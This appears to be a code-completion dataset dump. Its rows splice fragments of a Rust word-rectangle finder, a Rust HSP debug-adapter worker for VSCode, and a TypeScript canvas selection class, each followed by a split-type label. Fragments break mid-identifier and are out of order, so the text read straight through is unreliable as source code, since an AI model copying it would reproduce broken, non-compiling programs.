.arg(Arg::with_name("plain-list-format")
.long("plain-format")
.short("p")
.long_help("Input wordlist is a plaintext UTF-8 newline-separated list of words")
.group("format")
)
.arg(Arg::with_name("input-filename")
.required(true)
.help("The path to the wordlist to read from, or \"-\" for stdin")
)
.arg(Arg::with_name("output-filename")
.required(true)
.help("The path to the wordlist to write to, or \"-\" for stdout")
)
).get_matches();
//println!("{:?}", matches.is_present("wordlist-preprocess"));
return match matches.subcommand() {
("compute", Some(m)) => compute_command(m),
("wordlist-preprocess", Some(m)) => wordlist_preprocess(m),
_ => panic!("This shouldn't happen"),
}
/*let mut args:Vec<String> = std::env::args().collect();
if args.len() < 2 {
eprintln!("Must have at least one argument (which sub-thing to run)");
return Ok(());
}
eprintln!("{:?}", args);
args.remove(0);
eprintln!("{:?}", args);
let name:&str = &(args.remove(0));
eprintln!("{:?}", args);
match name {
"wordlist-preprocess" => return wordlist_preprocess(args),
"compute" => return compute_command(args),
unfound_command => eprintln!("unrecognized command {}", unfound_command),
}*/
}
fn filter_word(word:&str) -> Option<String> {
let mut success = true;
let res = Some(word.chars().map(|c| {
match encode(c) {
Some(_) => c,
None => {
let chars:Vec<char> = c.to_string().skeleton_chars().collect();
if chars.len() != 1 {
success = false;
'a'
} else {
match encode(chars[0]) {
Some(_) => chars[0],
None => {success = false; 'a'},
}
}
},
}
}).collect::<String>());
if success {
return res
} else {
return None
}
}
fn wordlist_preprocess(args:&ArgMatches) -> io::Result<()> {
let in_file = File::open( args.value_of("input-filename" ).unwrap())?;
let out_file = File::create(args.value_of("output-filename").unwrap())?;
let wik_format = args.is_present("wiktionary-list-format");
let f = BufReader::new(in_file);
let mut fo = BufWriter::new(out_file);
let mut lines = f.lines();
if wik_format {
//Skip the first line
lines.next().unwrap()?;
}
for line_result in lines {
let line = line_result?;
let word;
if wik_format {
let mut split = line.split('\t');
split.next().unwrap(); // skip before tab
word = split.next().unwrap();
match split.next() {
Some(_) => panic!("Only one tab expected per line"),
None => (),
}
} else {
word = &line
}
match filter_word(word) {
Some(word) => writeln!(&mut fo, "{}", word)?,
None => (),
}
}
fo.flush()?;
return Ok(());
}
fn make_words | .author(crate_authors!())
.about(crate_description!()) | random_line_split |
main.rs | ernal:u32) -> CharSet {
return CharSet{internal}
}
fn add(&mut self, val:u8) {
if val > 31 {panic!("Invalid val {}", val)}
self.internal |= 2u32.pow(val as u32)
}
fn and(&self, other:&Self) -> Self {
Self{ internal: self.internal & other.internal }
}
fn has(&self, val:u8) -> bool {
if val > 31 {
panic!("Invalid val {}", val)
} else {
return (self.internal & 2u32.pow(val as u32)) > 0
}
}
}
impl Default for CharSet {
fn default() -> Self {
CharSet::new(0)
}
}
// NOTE: can only go up to 15. 16 would break everything
//const WORD_SQUARE_ORDER:usize = 6;
// const WORD_SQUARE_WIDTH:usize = 8;
// const WORD_SQUARE_HEIGHT:usize = 6;
#[cfg(feature = "width-2")]
const WORD_SQUARE_WIDTH:usize = 2;
#[cfg(feature = "width-3")]
const WORD_SQUARE_WIDTH:usize = 3;
#[cfg(feature = "width-4")]
const WORD_SQUARE_WIDTH:usize = 4;
#[cfg(feature = "width-5")]
const WORD_SQUARE_WIDTH:usize = 5;
#[cfg(feature = "width-6")]
const WORD_SQUARE_WIDTH:usize = 6;
#[cfg(feature = "width-7")]
const WORD_SQUARE_WIDTH:usize = 7;
#[cfg(feature = "width-8")]
const WORD_SQUARE_WIDTH:usize = 8;
#[cfg(feature = "width-9")]
const WORD_SQUARE_WIDTH:usize = 9;
#[cfg(feature = "width-10")]
const WORD_SQUARE_WIDTH:usize = 10;
#[cfg(feature = "width-11")]
const WORD_SQUARE_WIDTH:usize = 11;
#[cfg(feature = "width-12")]
const WORD_SQUARE_WIDTH:usize = 12;
#[cfg(feature = "width-13")]
const WORD_SQUARE_WIDTH:usize = 13;
#[cfg(feature = "width-14")]
const WORD_SQUARE_WIDTH:usize = 14;
#[cfg(feature = "width-15")]
const WORD_SQUARE_WIDTH:usize = 15;
#[cfg(feature = "height-2")]
const WORD_SQUARE_HEIGHT:usize = 2;
#[cfg(feature = "height-3")]
const WORD_SQUARE_HEIGHT:usize = 3;
#[cfg(feature = "height-4")]
const WORD_SQUARE_HEIGHT:usize = 4;
#[cfg(feature = "height-5")]
const WORD_SQUARE_HEIGHT:usize = 5;
#[cfg(feature = "height-6")]
const WORD_SQUARE_HEIGHT:usize = 6;
#[cfg(feature = "height-7")]
const WORD_SQUARE_HEIGHT:usize = 7;
#[cfg(feature = "height-8")]
const WORD_SQUARE_HEIGHT:usize = 8;
#[cfg(feature = "height-9")]
const WORD_SQUARE_HEIGHT:usize = 9;
#[cfg(feature = "height-10")]
const WORD_SQUARE_HEIGHT:usize = 10;
#[cfg(feature = "height-11")]
const WORD_SQUARE_HEIGHT:usize = 11;
#[cfg(feature = "height-12")]
const WORD_SQUARE_HEIGHT:usize = 12;
#[cfg(feature = "height-13")]
const WORD_SQUARE_HEIGHT:usize = 13;
#[cfg(feature = "height-14")]
const WORD_SQUARE_HEIGHT:usize = 14;
#[cfg(feature = "height-15")]
const WORD_SQUARE_HEIGHT:usize = 15;
//const WORD_ORDER_U8:u8 = WORD_SQUARE_ORDER as u8;
const WORD_SQUARE_SIZE:usize = WORD_SQUARE_WIDTH * WORD_SQUARE_HEIGHT;
type WideWord = [u8; WORD_SQUARE_WIDTH];
type TallWord = [u8; WORD_SQUARE_HEIGHT];
type WordSquare = [u8; WORD_SQUARE_SIZE];
#[derive(Debug,Default)]
struct WordIndex {
inner_rows: FnvHashMap<WideWord,CharSet>,
#[cfg(not(feature = "square"))]
inner_cols: FnvHashMap<TallWord,CharSet>,
}
impl WordIndex {
fn rows(&self) -> &FnvHashMap<WideWord,CharSet> {
&self.inner_rows
}
fn cols(&self) -> &FnvHashMap<TallWord,CharSet> {
#[cfg(not(feature = "square"))]
return &self.inner_cols;
#[cfg(feature = "square")]
return self.rows();
}
fn rows_mut(&mut self) -> &mut FnvHashMap<WideWord,CharSet> {
&mut self.inner_rows
}
#[cfg(not(feature = "square"))]
fn cols_mut(&mut self) -> &mut FnvHashMap<TallWord,CharSet> {
&mut self.inner_cols
}
}
fn print_word_square(sq:WordSquare){
let mut first = true;
for i in 0..WORD_SQUARE_HEIGHT {
let mut chars = Vec::new();
for j in 0..WORD_SQUARE_WIDTH {
chars.push(decode(sq[i*WORD_SQUARE_WIDTH + j]).unwrap());
}
let word = chars.iter().collect::<String>();
if !first {
print!("-");
}
print!("{}", word);
first = false;
}
println!();
}
fn main() -> io::Result<()> {
let matches = App::new(format!("Rust Word Rectangle Finder o{}x{}", WORD_SQUARE_WIDTH, WORD_SQUARE_HEIGHT))
.version(crate_version!())
.author(crate_authors!())
.about(crate_description!())
.setting(clap::AppSettings::SubcommandRequired)
.subcommand(SubCommand::with_name("compute")
.about("Does the actual computation.")
.arg(Arg::with_name("threads")
.default_value("4")
.takes_value(true)
.validator(|arg| {
match arg.parse::<u32>() {
Ok(_) => Ok(()),
Err(e) => Err(String::from(format!("Must provide a valid integer. {:?}", e))),
}
})
.help("Number of threads to use.")
.long("threads")
.short("t")
)
.arg(Arg::with_name("wordlist")
.required(true)
.help("the wordlist file path, a plain-text UTF-8 file with each word separated by a newline")
)
.arg(Arg::with_name("ignore-empty-wordlist")
.long("ignore-empty-wordlist")
.help("Don't complain if there are no words of the necessary length in the given wordlist")
)
.arg(Arg::with_name("ignore-unencodeable")
.long("ignore-unencodeable")
.help("Don't show a warning when a word is dropped because it contains unencodeable characters.")
)
.arg(Arg::with_name("quiet")
.long("quiet")
.short("q")
.help("Don't show any status messages; STDERR will be empty if no errors occured.")
)
)
.subcommand(SubCommand::with_name("wordlist-preprocess")
.about("Takes in a wordlist (of various formats) and converts characters to a consistent set, for example 'а' (U+0430 CYRILLIC SMALL LETTER A) becomes 'a' (U+0061 LATIN SMALL LETTER A). Any words that would be ignored by the compute function are also filtered out.")
.arg(Arg::with_name("wiktionary-list-format")
.long("wiktionary-format")
.short("w")
.long_help("Input wordlist is in wiktionary \"all-titles\" format.")
.group("format")
)
.arg(Arg::with_name("plain-list-format")
.long("plain-format")
.short("p")
.long_help("Input wordlist is a plaintext UTF-8 newline-separated list of words")
.group("format")
)
.arg(Arg::with_name("input-filename")
.required(true)
.help("The path to the wordlist to read from, or \"-\" for stdin")
)
.arg(Arg::with_name("output-filename")
.required(true)
.help("The path to the wordlist to write to, or \"-\" for stdout")
)
).get_matches();
//println!("{:?}", matches.is_present("wordlist-preprocess"));
return match matches.subcommand() {
("compute", Some(m)) => compute_command(m),
("wordlist-preprocess", Some(m)) => wordlist_preprocess(m),
_ => panic!("This shouldn't happen"),
}
/*let mut args:Vec<String> = std::env::args().collect();
if args.len() < 2 {
eprintln!("Must have at least one argument (which sub-thing to run)");
return Ok(());
}
eprintln!("{:?}", args);
args.remove(0);
eprintln!("{:?}", args);
let name:&str = &(args.remove(0));
eprintln!("{:?}", args);
match name {
"wordlist-preprocess" => return wordlist_preprocess(args),
"compute" => return compute_command(args),
unfound_command => eprintln!(" | int | identifier_name | |
app.rs | ,
}
}
pub | r_ref(r: VarRef) -> Option<Self> {
match r {
1 => Some(VarPath::Globals),
i if i >= 2 => Some(VarPath::Static((i - 2) as usize)),
_ => None,
}
}
}
#[derive(Clone, Debug)]
pub(crate) struct RuntimeState {
file_name: Option<String>,
file_path: Option<String>,
line: i32,
stopped: bool,
}
/// `Worker` が扱える操作。
#[derive(Clone, Debug)]
pub(crate) enum Action {
/// VSCode との接続が確立したとき。
AfterConnected,
/// VSCode からリクエストが来たとき。
AfterRequestReceived(dap::Msg),
/// assert で停止したとき。
AfterStopped(String, i32),
/// HSP ランタイムが終了する直前。
BeforeTerminating,
AfterDebugInfoLoaded(hsp_ext::debug_info::DebugInfo<hsp_ext::debug_info::HspConstantMap>),
AfterGetVar {
seq: i64,
variables: Vec<dap::Variable>,
},
}
/// `Worker` に処理を依頼するもの。
#[derive(Clone, Debug)]
pub(crate) struct Sender {
sender: mpsc::Sender<Action>,
}
impl Sender {
pub(crate) fn send(&self, action: Action) {
self.sender.send(action).map_err(|e| error!("{:?}", e)).ok();
}
}
/// HSP ランタイムと VSCode の仲介を行う。
pub(crate) struct Worker {
request_receiver: mpsc::Receiver<Action>,
connection_sender: Option<connection::Sender>,
hsprt_sender: Option<hsprt::Sender>,
is_connected: bool,
args: Option<dap::LaunchRequestArgs>,
state: RuntimeState,
debug_info: Option<hsp_ext::debug_info::DebugInfo<hsp_ext::debug_info::HspConstantMap>>,
source_map: Option<hsp_ext::source_map::SourceMap>,
#[allow(unused)]
join_handle: Option<thread::JoinHandle<()>>,
}
impl Worker {
pub fn new(hsprt_sender: hsprt::Sender) -> (Self, Sender) {
let (sender, request_receiver) = mpsc::channel::<Action>();
let app_sender = Sender { sender };
let (connection_worker, connection_sender) = connection::Worker::new(app_sender.clone());
let join_handle = thread::Builder::new()
.name("connection_worker".into())
.spawn(move || connection_worker.run())
.unwrap();
let worker = Worker {
request_receiver,
connection_sender: Some(connection_sender),
hsprt_sender: Some(hsprt_sender),
is_connected: false,
args: None,
state: RuntimeState {
file_path: None,
file_name: None,
line: 1,
stopped: false,
},
debug_info: None,
source_map: None,
join_handle: Some(join_handle),
};
(worker, app_sender)
}
fn is_launch_response_sent(&self) -> bool {
self.args.is_some()
}
pub fn run(mut self) {
self.connection_sender
.as_ref()
.unwrap()
.send(connection::Action::Connect);
loop {
match self.request_receiver.recv() {
Ok(action @ Action::BeforeTerminating) => {
self.handle(action);
break;
}
Ok(action) => {
self.handle(action);
continue;
}
Err(err) => {
error!("[app] {:?}", err);
break;
}
}
}
info!("[app] 終了");
}
/// HSP ランタイムが次に中断しているときにアクションが実行されるように予約する。
/// すでに停止しているときは即座に実行されるように、メッセージを送る。
fn send_to_hsprt(&self, action: hsprt::Action) {
if let Some(sender) = self.hsprt_sender.as_ref() {
sender.send(action, self.state.stopped);
}
}
fn send_response(&mut self, request_seq: i64, response: dap::Response) {
if let Some(sender) = self.connection_sender.as_ref() {
sender.send(connection::Action::Send(dap::Msg::Response {
request_seq,
success: true,
e: response,
}));
}
}
fn send_response_failure(&mut self, request_seq: i64, response: dap::Response) {
if let Some(sender) = self.connection_sender.as_ref() {
sender.send(connection::Action::Send(dap::Msg::Response {
request_seq,
success: false,
e: response,
}));
}
}
fn send_event(&self, event: dap::Event) {
if let Some(sender) = self.connection_sender.as_ref() {
sender.send(connection::Action::Send(dap::Msg::Event { e: event }));
}
}
fn send_initialized_event(&self) {
if self.is_connected && self.is_launch_response_sent() {
self.send_event(dap::Event::Initialized);
}
}
fn send_pause_event(&self) {
if self.state.stopped && self.is_launch_response_sent() {
self.send_event(dap::Event::Stopped {
reason: "pause".to_owned(),
thread_id: MAIN_THREAD_ID,
});
}
}
fn on_request(&mut self, seq: i64, request: dap::Request) {
match request {
dap::Request::Launch { args } => {
self.args = Some(args);
self.load_source_map();
self.send_response(seq, dap::Response::Launch);
self.send_initialized_event();
}
dap::Request::SetExceptionBreakpoints { .. } => {
self.send_response(seq, dap::Response::SetExceptionBreakpoints);
self.send_pause_event();
}
dap::Request::ConfigurationDone => {
self.send_response(seq, dap::Response::ConfigurationDone);
}
dap::Request::Threads => {
self.send_response(seq, dap::Response::Threads { threads: threads() })
}
dap::Request::Source { source } => {
match source.and_then(|source| Some(std::fs::read_to_string(source.path?).ok()?)) {
Some(content) => self.send_response(seq, dap::Response::Source { content }),
None => self.send_response_failure(
seq,
dap::Response::Source {
content: "".to_owned(),
},
),
}
}
dap::Request::StackTrace { .. } => {
if self.state.file_path.is_none() {
let file_path = self
.state
.file_name
.as_ref()
.and_then(|file_name| self.resolve_file_path(file_name));
self.state.file_path = file_path;
}
let stack_frames = vec![dap::StackFrame {
id: 1,
name: "main".to_owned(),
line: std::cmp::max(1, self.state.line) as usize,
source: dap::Source {
name: "main".to_owned(),
path: self.state.file_path.to_owned(),
},
}];
self.send_response(seq, dap::Response::StackTrace { stack_frames });
}
dap::Request::Scopes { .. } => {
let scopes = vec![dap::Scope {
name: "グローバル".to_owned(),
variables_reference: GLOBAL_SCOPE_REF,
expensive: true,
}];
self.send_response(seq, dap::Response::Scopes { scopes });
}
dap::Request::Variables {
variables_reference,
} => {
if let Some(var_path) = VarPath::from_var_ref(variables_reference) {
self.send_to_hsprt(hsprt::Action::GetVar { seq, var_path });
}
}
dap::Request::Pause { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STOP as hspsdk::DebugMode,
));
self.send_response(
seq,
dap::Response::Pause {
thread_id: MAIN_THREAD_ID,
},
);
}
dap::Request::Continue { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_RUN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::Continue);
self.send_event(dap::Event::Continued {
all_threads_continued: true,
});
self.state.stopped = false;
}
dap::Request::Next { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STEPIN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::Next);
}
dap::Request::StepIn { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STEPIN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::StepIn);
}
dap::Request::StepOut { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk | fn from_va | identifier_name |
app.rs | thread::JoinHandle<()>>,
}
impl Worker {
pub fn new(hsprt_sender: hsprt::Sender) -> (Self, Sender) {
let (sender, request_receiver) = mpsc::channel::<Action>();
let app_sender = Sender { sender };
let (connection_worker, connection_sender) = connection::Worker::new(app_sender.clone());
let join_handle = thread::Builder::new()
.name("connection_worker".into())
.spawn(move || connection_worker.run())
.unwrap();
let worker = Worker {
request_receiver,
connection_sender: Some(connection_sender),
hsprt_sender: Some(hsprt_sender),
is_connected: false,
args: None,
state: RuntimeState {
file_path: None,
file_name: None,
line: 1,
stopped: false,
},
debug_info: None,
source_map: None,
join_handle: Some(join_handle),
};
(worker, app_sender)
}
fn is_launch_response_sent(&self) -> bool {
self.args.is_some()
}
pub fn run(mut self) {
self.connection_sender
.as_ref()
.unwrap()
.send(connection::Action::Connect);
loop {
match self.request_receiver.recv() {
Ok(action @ Action::BeforeTerminating) => {
self.handle(action);
break;
}
Ok(action) => {
self.handle(action);
continue;
}
Err(err) => {
error!("[app] {:?}", err);
break;
}
}
}
info!("[app] 終了");
}
/// HSP ランタイムが次に中断しているときにアクションが実行されるように予約する。
/// すでに停止しているときは即座に実行されるように、メッセージを送る。
fn send_to_hsprt(&self, action: hsprt::Action) {
if let Some(sender) = self.hsprt_sender.as_ref() {
sender.send(action, self.state.stopped);
}
}
fn send_response(&mut self, request_seq: i64, response: dap::Response) {
if let Some(sender) = self.connection_sender.as_ref() {
sender.send(connection::Action::Send(dap::Msg::Response {
request_seq,
success: true,
e: response,
}));
}
}
fn send_response_failure(&mut self, request_seq: i64, response: dap::Response) {
if let Some(sender) = self.connection_sender.as_ref() {
sender.send(connection::Action::Send(dap::Msg::Response {
request_seq,
success: false,
e: response,
}));
}
}
fn send_event(&self, event: dap::Event) {
if let Some(sender) = self.connection_sender.as_ref() {
sender.send(connection::Action::Send(dap::Msg::Event { e: event }));
}
}
fn send_initialized_event(&self) {
if self.is_connected && self.is_launch_response_sent() {
self.send_event(dap::Event::Initialized);
}
}
fn send_pause_event(&self) {
if self.state.stopped && self.is_launch_response_sent() {
self.send_event(dap::Event::Stopped {
reason: "pause".to_owned(),
thread_id: MAIN_THREAD_ID,
});
}
}
fn on_request(&mut self, seq: i64, request: dap::Request) {
match request {
dap::Request::Launch { args } => {
self.args = Some(args);
self.load_source_map();
self.send_response(seq, dap::Response::Launch);
self.send_initialized_event();
}
dap::Request::SetExceptionBreakpoints { .. } => {
self.send_response(seq, dap::Response::SetExceptionBreakpoints);
self.send_pause_event();
}
dap::Request::ConfigurationDone => {
self.send_response(seq, dap::Response::ConfigurationDone);
}
dap::Request::Threads => {
self.send_response(seq, dap::Response::Threads { threads: threads() })
}
dap::Request::Source { source } => {
match source.and_then(|source| Some(std::fs::read_to_string(source.path?).ok()?)) {
Some(content) => self.send_response(seq, dap::Response::Source { content }),
None => self.send_response_failure(
seq,
dap::Response::Source {
content: "".to_owned(),
},
),
}
}
dap::Request::StackTrace { .. } => {
if self.state.file_path.is_none() {
let file_path = self
.state
.file_name
.as_ref()
.and_then(|file_name| self.resolve_file_path(file_name));
self.state.file_path = file_path;
}
let stack_frames = vec![dap::StackFrame {
id: 1,
name: "main".to_owned(),
line: std::cmp::max(1, self.state.line) as usize,
source: dap::Source {
name: "main".to_owned(),
path: self.state.file_path.to_owned(),
},
}];
self.send_response(seq, dap::Response::StackTrace { stack_frames });
}
dap::Request::Scopes { .. } => {
let scopes = vec![dap::Scope {
name: "グローバル".to_owned(),
variables_reference: GLOBAL_SCOPE_REF,
expensive: true,
}];
self.send_response(seq, dap::Response::Scopes { scopes });
}
dap::Request::Variables {
variables_reference,
} => {
if let Some(var_path) = VarPath::from_var_ref(variables_reference) {
self.send_to_hsprt(hsprt::Action::GetVar { seq, var_path });
}
}
dap::Request::Pause { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STOP as hspsdk::DebugMode,
));
self.send_response(
seq,
dap::Response::Pause {
thread_id: MAIN_THREAD_ID,
},
);
}
dap::Request::Continue { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_RUN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::Continue);
self.send_event(dap::Event::Continued {
all_threads_continued: true,
});
self.state.stopped = false;
}
dap::Request::Next { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STEPIN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::Next);
}
dap::Request::StepIn { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STEPIN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::StepIn);
}
dap::Request::StepOut { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STEPIN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::StepOut);
}
dap::Request::Disconnect { .. } => {
self.send_to_hsprt(hsprt::Action::Disconnect);
}
}
}
fn load_source_map(&mut self) {
if self.source_map.is_some() {
return;
}
let debug_info = match self.debug_info {
None => return,
Some(ref debug_info) => debug_info,
};
let args = match self.args {
None => return,
Some(ref args) => args,
};
let root = PathBuf::from(&args.root);
let mut source_map = hsp_ext::source_map::SourceMap::new(&root);
let file_names = debug_info.file_names();
source_map.add_search_path(PathBuf::from(&args.program).parent());
source_map.add_file_names(
&file_names
.iter()
.map(|name| name.as_str())
.collect::<Vec<&str>>(),
);
self.source_map = Some(source_map);
}
/// ファイル名を絶対パスにする。
/// FIXME: common 以下や 無修飾 include パスに対応する。
fn resolve_file_path(&self, file_name: &String) -> Option<String> {
if file_name == "???" {
return None;
}
let source_map = self.source_map.as_ref()?;
let full_path = source_map.resolve_file_name(file_name)?;
Some(full_path.to_str()?.to_owned())
}
fn handle(&mut self, action: Action) {
debug!("[app] {:?}", action);
match action {
Action::AfterRequestReceived(dap::Msg::Request { seq, e }) => {
self.on_request(seq, e);
}
Action::AfterRequestReceived(_) => | {
warn!("[app] リクエストではない DAP メッセージを無視");
}
Action::AfterStopped(file_name, line) => {
let file_path = self.resolve_file_path(&file_name);
self.state = RuntimeState | identifier_body | |
app.rs | 前。
BeforeTerminating,
AfterDebugInfoLoaded(hsp_ext::debug_info::DebugInfo<hsp_ext::debug_info::HspConstantMap>),
AfterGetVar {
seq: i64,
variables: Vec<dap::Variable>,
},
}
/// `Worker` に処理を依頼するもの。
#[derive(Clone, Debug)]
pub(crate) struct Sender {
sender: mpsc::Sender<Action>,
}
impl Sender {
pub(crate) fn send(&self, action: Action) {
self.sender.send(action).map_err(|e| error!("{:?}", e)).ok();
}
}
/// HSP ランタイムと VSCode の仲介を行う。
pub(crate) struct Worker {
request_receiver: mpsc::Receiver<Action>,
connection_sender: Option<connection::Sender>,
hsprt_sender: Option<hsprt::Sender>,
is_connected: bool,
args: Option<dap::LaunchRequestArgs>,
state: RuntimeState,
debug_info: Option<hsp_ext::debug_info::DebugInfo<hsp_ext::debug_info::HspConstantMap>>,
source_map: Option<hsp_ext::source_map::SourceMap>,
#[allow(unused)]
join_handle: Option<thread::JoinHandle<()>>,
}
impl Worker {
pub fn new(hsprt_sender: hsprt::Sender) -> (Self, Sender) {
let (sender, request_receiver) = mpsc::channel::<Action>();
let app_sender = Sender { sender };
let (connection_worker, connection_sender) = connection::Worker::new(app_sender.clone());
let join_handle = thread::Builder::new()
.name("connection_worker".into())
.spawn(move || connection_worker.run())
.unwrap();
let worker = Worker {
request_receiver,
connection_sender: Some(connection_sender),
hsprt_sender: Some(hsprt_sender),
is_connected: false,
args: None,
state: RuntimeState {
file_path: None,
file_name: None,
line: 1,
stopped: false,
},
debug_info: None,
source_map: None,
join_handle: Some(join_handle),
};
(worker, app_sender)
}
fn is_launch_response_sent(&self) -> bool {
self.args.is_some()
}
pub fn run(mut self) {
self.connection_sender
.as_ref()
.unwrap()
.send(connection::Action::Connect);
loop {
match self.request_receiver.recv() {
Ok(action @ Action::BeforeTerminating) => {
self.handle(action);
break;
}
Ok(action) => {
self.handle(action);
continue;
}
Err(err) => {
error!("[app] {:?}", err);
break;
}
}
}
info!("[app] 終了");
}
/// HSP ランタイムが次に中断しているときにアクションが実行されるように予約する。
/// すでに停止しているときは即座に実行されるように、メッセージを送る。
fn send_to_hsprt(&self, action: hsprt::Action) {
if let Some(sender) = self.hsprt_sender.as_ref() {
sender.send(action, self.state.stopped);
}
}
fn send_response(&mut self, request_seq: i64, response: dap::Response) {
if let Some(sender) = self.connection_sender.as_ref() {
sender.send(connection::Action::Send(dap::Msg::Response {
request_seq,
success: true,
e: response,
}));
}
}
fn send_response_failure(&mut self, request_seq: i64, response: dap::Response) {
if let Some(sender) = self.connection_sender.as_ref() {
sender.send(connection::Action::Send(dap::Msg::Response {
request_seq,
success: false,
e: response,
}));
}
}
fn send_event(&self, event: dap::Event) {
if let Some(sender) = self.connection_sender.as_ref() {
sender.send(connection::Action::Send(dap::Msg::Event { e: event }));
}
}
fn send_initialized_event(&self) {
if self.is_connected && self.is_launch_response_sent() {
self.send_event(dap::Event::Initialized);
}
}
fn send_pause_event(&self) {
if self.state.stopped && self.is_launch_response_sent() {
self.send_event(dap::Event::Stopped {
reason: "pause".to_owned(),
thread_id: MAIN_THREAD_ID,
});
}
}
fn on_request(&mut self, seq: i64, request: dap::Request) {
match request {
dap::Request::Launch { args } => {
self.args = Some(args);
self.load_source_map();
self.send_response(seq, dap::Response::Launch);
self.send_initialized_event();
}
dap::Request::SetExceptionBreakpoints { .. } => {
self.send_response(seq, dap::Response::SetExceptionBreakpoints);
self.send_pause_event();
}
dap::Request::ConfigurationDone => {
self.send_response(seq, dap::Response::ConfigurationDone);
}
dap::Request::Threads => {
self.send_response(seq, dap::Response::Threads { threads: threads() })
}
dap::Request::Source { source } => {
match source.and_then(|source| Some(std::fs::read_to_string(source.path?).ok()?)) {
Some(content) => self.send_response(seq, dap::Response::Source { content }),
None => self.send_response_failure(
seq,
dap::Response::Source {
content: "".to_owned(),
},
),
}
}
dap::Request::StackTrace { .. } => {
if self.state.file_path.is_none() {
let file_path = self
.state
.file_name
.as_ref()
.and_then(|file_name| self.resolve_file_path(file_name));
self.state.file_path = file_path;
}
let stack_frames = vec![dap::StackFrame {
id: 1,
name: "main".to_owned(),
line: std::cmp::max(1, self.state.line) as usize,
source: dap::Source {
name: "main".to_owned(),
path: self.state.file_path.to_owned(),
},
}];
self.send_response(seq, dap::Response::StackTrace { stack_frames });
}
dap::Request::Scopes { .. } => {
let scopes = vec![dap::Scope {
name: "グローバル".to_owned(),
variables_reference: GLOBAL_SCOPE_REF,
expensive: true,
}];
self.send_response(seq, dap::Response::Scopes { scopes });
}
dap::Request::Variables {
variables_reference,
} => {
if let Some(var_path) = VarPath::from_var_ref(variables_reference) {
self.send_to_hsprt(hsprt::Action::GetVar { seq, var_path });
}
}
dap::Request::Pause { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STOP as hspsdk::DebugMode,
));
self.send_response(
seq,
dap::Response::Pause {
thread_id: MAIN_THREAD_ID,
},
);
}
dap::Request::Continue { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_RUN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::Continue);
self.send_event(dap::Event::Continued {
all_threads_continued: true,
});
self.state.stopped = false;
}
dap::Request::Next { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STEPIN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::Next);
}
dap::Request::StepIn { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STEPIN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::StepIn);
}
dap::Request::StepOut { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STEPIN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::StepOut);
}
dap::Request::Disconnect { .. } => {
self.send_to_hsprt(hsprt::Action::Disconnect);
}
}
}
fn load_source_map(&mut self) {
if self.source_map.is_some() {
return;
}
let debug_info = match self.debug_info {
None => return,
Some(ref debug_info) => debug_info,
};
let args = match self.args {
None => return,
Some(ref args) => args,
};
let root = PathBuf::from(&args.root);
let mut source_map = hsp_ext::source_map::SourceMap::new(&root); | let file_names = debug_info.file_names();
source_map.add_search_path(PathBuf::from(&args.program).parent());
source_map.add_file_names(
&file_names | random_line_split | |
CanvasState.ts | (canvas, null)['paddingTop'], 10) || 0;
this.styleBorderLeft = parseInt(document.defaultView.getComputedStyle(canvas, null)['borderLeftWidth'], 10) || 0;
this.styleBorderTop = parseInt(document.defaultView.getComputedStyle(canvas, null)['borderTopWidth'], 10) || 0;
}
this.border = 1 ;
// Some pages have fixed-position bars (like the stumbleupon bar) at the top or left of the page
// They will mess up mouse coordinates and this fixes that
var html = document.body.parentElement;
this.htmlTop = html.offsetTop;
this.htmlLeft = html.offsetLeft;
this.handleParentScroll = false ;
// **** Keep track of state! ****
this.valid = false; // when set to false, the canvas will redraw everything
this.shapes = []; // the collection of things to be drawn
this.dragging = false; // Keep track of when we are dragging
this.drawing = false; // Keep track of when we are drawing
// the current selected object. In the future we could turn this into an array for multiple selection
this.selection = null;
this.dragoffx = 0; // See mousedown and mousemove events for explanation
this.dragoffy = 0;
// This is an example of a closure!
// Right here "this" means the CanvasState. But we are making events on the Canvas itself,
// and when the events are fired on the canvas the variable "this" is going to mean the canvas!
// Since we still want to use this particular CanvasState in the events we have to save a reference to it.
// This is our reference!
var myState = this;
myState.alert = false;
// **** Options! ****
this.selectionColor = '#CC0000';
this.selectionWidth = 2;
this.interval = 10;
setInterval(function () { myState.draw(); }, myState.interval);
}
registerListeners = () => {
var myState = this;
var canvas = this.canvas;
//fixes a problem where double clicking causes text to get selected on the canvas
canvas.addEventListener('selectstart', function (e) { e.preventDefault(); return false; }, false);
// Up, down, and move are for dragging
canvas.addEventListener('mousedown', function (e) {
if (myState.imageObj !== false && myState.imageObj.width + 2 * myState.border != canvas.width) {
myState.dragging = false;
myState.drawing = false;
if (myState.alert == false) {
alert('La sélection de zone n\'est possible que si le zoom est désactivé !');
myState.alert = true;
}
} else {
var mouse = myState.getMouse(e);
var mx = mouse.x;
var my = mouse.y;
var shapes = myState.shapes;
